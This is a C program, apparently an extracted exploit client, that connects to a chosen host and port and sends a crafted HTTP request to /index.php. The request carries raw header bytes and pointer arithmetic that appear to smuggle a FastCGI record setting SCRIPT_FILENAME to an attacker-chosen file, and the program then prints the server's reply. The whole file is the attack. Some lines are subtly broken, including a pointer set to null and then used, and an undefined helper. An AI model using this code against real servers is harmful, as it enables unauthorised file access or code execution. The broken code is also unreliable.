
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int append_header (char*,int,int,int) ;
 int atoi (char*) ;
 int close (int) ;
 int exit (int ) ;
 int fprintf (int ,char*,...) ;
 int free (char*) ;
 char* malloc (int) ;
 int memcpy (char*,char*,int) ;
 int network (char*,int ) ;
 int printf (char*,char*) ;
 int read (int,char*,int) ;
 int sprintf (char*,char*,...) ;
 int stderr ;
 int strlen (char*) ;
 int write (int,char*,int) ;

int main(int argc, char **argv)
{
 char *b, *p;
 int sock, i;
 char tmp[1024];

 if(argc < 4) {
  fprintf(stderr, "Usage: %s <host> <port> <file>\n", argv[0]);
  exit(0);
 }

 sock = network(argv[1], atoi(argv[2]));

 if(sock <= 0) {
  fprintf(stderr, "Host down?\n");
  exit(0);
 }

 b = p = malloc(0xffff + 0xffff);

 p += sprintf(p, "GET /index.php HTTP/1.1\r\n");
 p += sprintf(p, "Host: %s\r\n", argv[1]);
 p += sprintf(p, "A: A\r\nB: ");

 *p++ = 128;
 *p++ = 0x00;
 *p++ = 0x54;
 *p++ = 0x42;
 *p++ = '\r';
 *p++ = '\n';
 p = 0x00;

 p += append_header(p, 0, 4, 1);
 p += append_header(p, 1, 200 , 25079);

 p -= 3631;

 *p++ = 1;
 *p++ = 4;
 *p++ = 0;
 *p++ = 0;

 i = sprintf(tmp, "SCRIPT_FILENAME");
 sprintf(tmp + i, "%s", argv[3]);

 *p++ = 0x00;
 *p++ = 2 + strlen(tmp);
 *p++ = 0x00;
 *p++ = 0x10;
 *p++ = i;
 *p++ = strlen(tmp) - i;

 memcpy(p, tmp, strlen(tmp));

 p += 3631 - 8 - 2;

 p += append_header(p, 2, 200, 40007);
 p += sprintf(p, "\r\n\r\n");

 write(sock, b, (p - b));

 i = read(sock, b, 0xffff);
 *(b + i) = 0;

 printf("%s\n", b);

 free(b);
 close(sock);

 return 0;
}
